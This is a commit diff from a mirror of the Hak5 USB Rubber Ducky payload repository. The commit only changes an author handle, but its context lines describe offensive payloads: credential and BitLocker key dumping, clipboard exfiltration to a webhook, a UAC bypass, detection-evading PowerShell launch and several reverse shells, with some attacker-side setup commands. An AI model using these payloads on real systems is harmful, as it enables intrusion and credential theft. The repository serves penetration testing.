hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Changed Username

pull/451/head
0i41E 2024-05-28 19:25:26 +02:00 committed by GitHub
parent 45ab8a2a48
commit 40f7f072ea
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
34 changed files with 77 additions and 77 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/extensions/community/DETECT_FINISHED
View File

@ -1,6 +1,6 @@
EXTENSION DETECT_FINISHED EXTENSION DETECT_FINISHED
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:

2
payloads/extensions/community/POWERSHELL_DOWNLOAD
View File

@ -1,6 +1,6 @@
EXTENSION POWERSHELL_DOWNLOAD EXTENSION POWERSHELL_DOWNLOAD
REM VERSION 1.0 REM VERSION 1.0
REM Author: 0iphor13 REM Author: 0i41E
REM Downloads the desired file via powershell REM Downloads the desired file via powershell
REM Use the method you want to use, via the specific function, define the URL and the output. REM Use the method you want to use, via the specific function, define the URL and the output.

2
payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION
View File

@ -1,6 +1,6 @@
EXTENSION ROLLING_POWERSHELL_EXECUTION EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0 REM VERSION 1.0
REM Author: 0iphor13 REM Author: 0i41E
REM OS: Windows REM OS: Windows
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum REM Requirements: PayloadStudio v.1.3 minimum

2
payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE
View File

@ -1,7 +1,7 @@
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK REM_BLOCK
Version: 1.0 Version: 1.0
Author: 0iphor13 Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM END_REM

2
payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
View File

@ -1,6 +1,6 @@
EXTENSION WINDOWS_ELEVATED_EXECUTION EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1 REM VERSION 1.1
REM Author: 0iphor13 REM Author: 0i41E
REM Executes the desired program with elevated privileges REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions REM additional extensions

2
payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL
View File

@ -1,6 +1,6 @@
EXTENSION WINDOWS_FILELESS_HID_EXFIL EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk. Extension for Keystroke Reflection data exfiltration without putting files on disk.

10
payloads/library/credentials/BitLockerKeyDump/payload.txt
View File

@ -1,7 +1,7 @@
REM BitLockerKeyDump REM BitLockerKeyDump
REM Version 1.0 REM Version 1.0
REM OS: Windows REM OS: Windows
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0 REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM END_REM
END_EXTENSION END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED EXTENSION DETECT_FINISHED
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION END_FUNCTION
END_EXTENSION END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk. Extension for Keystroke Reflection data exfiltration without putting files on disk.

2
payloads/library/credentials/BitLockerKeyDump/readme.md
View File

@ -1,6 +1,6 @@
**Title: BitLockerKeyDump** **Title: BitLockerKeyDump**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0<br> Version: 1.0<br>

4
payloads/library/credentials/SamDumpDucky/README.md
View File

@ -1,6 +1,6 @@
**Title: SamDumpDucky** **Title: SamDumpDucky**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 2.0<br> Version: 2.0<br>
@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.** **!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png) ![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

10
payloads/library/credentials/SamDumpDucky/payload.txt
View File

@ -1,6 +1,6 @@
REM Title: SamDumpDucky REM Title: SamDumpDucky
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes. REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
REM Author: 0iphor13 REM Author: 0i41E
REM Version: 2.0 REM Version: 2.0
REM Category: Credentials REM Category: Credentials
REM Attackmodes: HID, Storage REM Attackmodes: HID, Storage
@ -36,10 +36,10 @@ EXTENSION DETECT_READY
CAPSLOCK CAPSLOCK
END_EXTENSION END_EXTENSION
REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here
EXTENSION WINDOWS_ELEVATED_EXECUTION EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1 REM VERSION 1.1
REM Author: 0iphor13 REM Author: 0i41E
REM Executes the desired program with elevated privileges REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions REM additional extensions
@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION
END_EXTENSION END_EXTENSION
REM Extension by 0iphor13, to signalize the successful execution of the payload REM Extension by 0i41E, to signalize the successful execution of the payload
EXTENSION DETECT_FINISHED EXTENSION DETECT_FINISHED
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:

10
payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
View File

@ -1,7 +1,7 @@
REM WindowsLicenseKeyExfiltration REM WindowsLicenseKeyExfiltration
REM Version 1.0 REM Version 1.0
REM OS: Windows REM OS: Windows
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0 REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry. REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM END_REM
END_EXTENSION END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED EXTENSION DETECT_FINISHED
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:
@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION END_FUNCTION
END_EXTENSION END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk. Extension for Keystroke Reflection data exfiltration without putting files on disk.

2
payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md
View File

@ -1,6 +1,6 @@
**Title: WindowsLicenseKeyExfiltration** **Title: WindowsLicenseKeyExfiltration**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0<br> Version: 1.0<br>

2
payloads/library/execution/DuckyHelper/DuckyHelper.txt
View File

@ -1,7 +1,7 @@
REM DuckyHelper REM DuckyHelper
REM Version 1.0 REM Version 1.0
REM OS: Windows 10 REM OS: Windows 10
REM Author: 0iphor13 REM Author: 0i41E
REM UAC bypass for privilege escalation (Method FodHelper) REM UAC bypass for privilege escalation (Method FodHelper)
REM AV will notify, but payload will still be executed REM AV will notify, but payload will still be executed

6
payloads/library/exfiltration/ClipBoard-Creep/README.md
View File

@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat
### #HOOK ### ### #HOOK ###
Define your webhook under #HOOK Define your webhook under #HOOK
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
### #CALLBACK_DELAY ### ### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers. Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)

8
payloads/library/exfiltration/ClipBoard-Creep/payload.txt
View File

@ -1,10 +1,10 @@
REM Clipboard-Creep REM Clipboard-Creep
REM Version 1.0 REM Version 1.0
REM OS: Windows REM OS: Windows
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server. REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT EXTENSION PASSIVE_WINDOWS_DETECT
@ -52,7 +52,7 @@ END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0 REM VERSION 1.0
REM Author: 0iphor13 REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection REM Starts Powershell in uncommon ways to avoid basic detection
@ -132,7 +132,7 @@ END_EXTENSION
EXTENSION Detect_Finished EXTENSION Detect_Finished
REM VERSION 1.0 REM VERSION 1.0
REM AUTHOR: 0iphor13 REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION REM_BLOCK DOCUMENTATION
USAGE: USAGE:

4
payloads/library/exfiltration/HashDumpDucky/README.md
View File

@ -1,6 +1,6 @@
**Title: HashDumpDucky** **Title: HashDumpDucky**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Requirements: DuckyScript 3.0<br> Requirements: DuckyScript 3.0<br>
Version: 1.0</p> Version: 1.0</p>
@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe
Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go
# #
Exfiltrate the out.txt file and try to crack the hashes. Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/HashDumpDucky/hash.png)
*props to Nikhil Mittal* *props to Nikhil Mittal*

2
payloads/library/exfiltration/HashDumpDucky/payload.txt
View File

@ -1,7 +1,7 @@
REM HashDumpDucky REM HashDumpDucky
REM Version 1.0 REM Version 1.0
REM OS: Windows REM OS: Windows
REM Author: 0iphor13 REM Author: 0i41E
REM Requirements: RubberDucky mk2/DuckyScript 3.0 REM Requirements: RubberDucky mk2/DuckyScript 3.0
REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection. REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection.

6
payloads/library/general/EngagementDucky/readme.md
View File

@ -1,6 +1,6 @@
**Title: EngagementDucky** **Title: EngagementDucky**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Requirements: DuckyScript 3.0<br> Requirements: DuckyScript 3.0<br>
Version: 1.0</p> Version: 1.0</p>
@ -10,7 +10,7 @@ Version: 1.0</p>
<p>EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.<br> <p>EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.<br>
Step up your game and demonstrate impact in a few seconds without leaving your scope.</p> Step up your game and demonstrate impact in a few seconds without leaving your scope.</p>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/usbidentifiers.png)
**Instruction:** **Instruction:**
1. Configure USB identifiers 1. Configure USB identifiers
@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s
2. Place inject.bin onto your Ducky 2. Place inject.bin onto your Ducky
3. Plug in your Ducky and wait until finish... walk away 3. Plug in your Ducky and wait until finish... walk away
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/general/EngagementDucky/proofpic.png)

2
payloads/library/general/duckin8or/payload.txt
View File

@ -54,7 +54,7 @@ REM # * Be responsible.
REM # # REM # #
REM # Kudos: # REM # Kudos: #
REM # * RootJunky - "Three Payloads from LOCK Key Double Press" # REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #
REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" # REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #
REM # * the-jcksn - "ducky_crab" # REM # * the-jcksn - "ducky_crab" #
REM # * I am Jakoby - "-RD-PineApple" # REM # * I am Jakoby - "-RD-PineApple" #
REM # * Hak5 Team # REM # * Hak5 Team #

2
payloads/library/prank/-RD-AcidBurn/README.md
View File

@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

2
payloads/library/prank/-RD-JumpScare/README.md
View File

@ -95,7 +95,7 @@ Arf
* [Hak5](https://hak5.org/) * [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG) * [MG](https://github.com/OMG-MG)
* [0iphor13](https://github.com/0iphor13) * [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter) * [PhilSutter](https://github.com/PhilSutter)

2
payloads/library/prank/EternalLock/payload.txt
View File

@ -1,7 +1,7 @@
REM EternalLock REM EternalLock
REM Version 1.0 REM Version 1.0
REM OS: Windows / Unix REM OS: Windows / Unix
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0 REM Requirement: DuckyScript 3.0
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out) REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)

2
payloads/library/prank/SoundChangeDuck/README.md
View File

@ -1,6 +1,6 @@
**Title: SoundChangeDuck** **Title: SoundChangeDuck**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0</p> Version: 1.0</p>

2
payloads/library/prank/SoundChangeDuck/payload.txt
View File

@ -1,7 +1,7 @@
REM SoundChangeDuck REM SoundChangeDuck
REM Version 1.0 REM Version 1.0
REM OS: Windows REM OS: Windows
REM Author: 0iphor13 REM Author: 0i41E
REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail. REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail.
REM You can of course decide which system sounds you want to change. REM You can of course decide which system sounds you want to change.

2
payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
# #
# Modified by 0iphor13 for PingZhellDucky # Modified by 0i41E for PingZhellDucky
# #
# #
# #

16
payloads/library/remote_access/PingZhellDucky/README.md
View File

@ -1,6 +1,6 @@
**Title: PingZhellDucky** **Title: PingZhellDucky**
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows & Unix<br> OS: Windows & Unix<br>
Version: 1.2<br> Version: 1.2<br>
Requirements: DuckyScript 3.0, perl</p> Requirements: DuckyScript 3.0, perl</p>
@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di
With automatic setup: With automatic setup:
Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png)
Define the IP of your attacking machine between the quotes at the ATTACKER section Define the IP of your attacking machine between the quotes at the ATTACKER section
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!) Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png)
Start the client -> `perl PingZhellDucky.pl` Start the client -> `perl PingZhellDucky.pl`
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
<p>Plug your Ducky into a Windows target.<br> <p>Plug your Ducky into a Windows target.<br>
Achieve reverse shell.<br> Achieve reverse shell.<br>
@ -38,7 +38,7 @@ Achieve reverse shell.<br>
**Instruction Version 2:** **Instruction Version 2:**
Without automatic setup: Without automatic setup:
Define INSTALL and set it to FALSE Define INSTALL and set it to FALSE
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
Upload PingZhellDucky.pl onto your attacking machine. Upload PingZhellDucky.pl onto your attacking machine.
Install dependencies, if needed: Install dependencies, if needed:
@ -50,10 +50,10 @@ Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1` `sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl PingZhellDucky.pl` Start the client -> `perl PingZhellDucky.pl`
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
Define the IP of your attacking machine between the quotes at the ATTACKER section Define the IP of your attacking machine between the quotes at the ATTACKER section
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
<p>Plug your Ducky into a Windows target.<br> <p>Plug your Ducky into a Windows target.<br>
Achieve reverse shell.<br> Achieve reverse shell.<br>

4
payloads/library/remote_access/PingZhellDucky/payload.txt
View File

@ -1,7 +1,7 @@
REM PingZhellDucky REM PingZhellDucky
REM Version 1.2 REM Version 1.2
REM OS: Windows & Unix REM OS: Windows & Unix
REM Author: 0iphor13 REM Author: 0i41E
REM Requirements: DuckScript 3.0, Perl REM Requirements: DuckScript 3.0, Perl
REM Getting remote access via ICMP or perform the required setup REM Getting remote access via ICMP or perform the required setup
@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
REM Will trigger when not using Windows - Best use with Linux REM Will trigger when not using Windows - Best use with Linux
DEFINE INSTALL TRUE DEFINE INSTALL TRUE
REM Link to the PingZhellDucky.pl client - Required for installation REM Link to the PingZhellDucky.pl client - Required for installation
DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN

2
payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
View File

@ -1,7 +1,7 @@
REM ReverseDucky REM ReverseDucky
REM Version 2.0 REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0 REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed. REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.

2
payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
View File

@ -1,7 +1,7 @@
REM ReverseDuckyII REM ReverseDuckyII
REM Version 2.0 REM Version 2.0
REM OS: Windows / Multi REM OS: Windows / Multi
REM Author: 0iphor13 REM Author: 0i41E
REM Requirement: DuckyScript 3.0 REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed. REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.

2
payloads/library/remote_access/ReverseDuckyIII/payload.txt
View File

@ -1,7 +1,7 @@
REM ReverseDucky3 REM ReverseDucky3
REM Version 1.2 (End of Life - This payload won't be updated anymore) REM Version 1.2 (End of Life - This payload won't be updated anymore)
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13 REM Author: 0i41E
REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway. REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
REM Fill in Attacker-IP and Port in Line 18 REM Fill in Attacker-IP and Port in Line 18

6
payloads/library/remote_access/ReverseDuckyPolymorph/README.md
View File

@ -1,6 +1,6 @@
**Title: ReverseDuckyPolymorph** **Title: ReverseDuckyPolymorph**
<p>Author: 0iphor13, Korben<br> <p>Author: 0i41E, Korben<br>
OS: Windows<br> OS: Windows<br>
Version: 1.1<br> Version: 1.1<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p> Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
@ -17,11 +17,11 @@ Using ReverseDuckyPolymorph is easy and straight forward.
- First, start a listener on your attacking machine via the tool of your choice. - First, start a listener on your attacking machine via the tool of your choice.
- Second, define the IP-Address and Port of your listening machine - Second, define the IP-Address and Port of your listening machine
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/listener.png)
- Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. - Third, compile the payload, using payloadstudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
# #
Every session you will gain via this payload will result in a different ID to verify a different pattern. Every session you will gain via this payload will result in a different ID to verify a different pattern.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png) ![alt text](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/media/ID.png)
Credit for DS 3.0 implentation and ideas: Credit for DS 3.0 implentation and ideas:
- Korben - Korben

2
payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
View File

@ -1,5 +1,5 @@
REM Title: ReverseDuckyPolymorph REM Title: ReverseDuckyPolymorph
REM Author: 0iphor13, Korben REM Author: 0i41E, Korben
REM Version 1.1 REM Version 1.1
REM Target: Windows / Linux(?) (Not tested with Powershell on Linux) REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)

16
payloads/library/remote_access/ReverseDuckyUltimate/README.md
View File

@ -1,6 +1,6 @@
# Title: ReverseDuckyUltimate # Title: ReverseDuckyUltimate
<p>Author: 0iphor13<br> <p>Author: 0i41E<br>
OS: Windows<br> OS: Windows<br>
Version: 1.0<br> Version: 1.0<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p> Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
@ -12,14 +12,14 @@ Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
# #
## Instruction ## Instruction
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup). Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0i41E/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
- First: Create key.pem & cert.pem like so: <br> - First: Create key.pem & cert.pem like so: <br>
``` ```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
``` ```
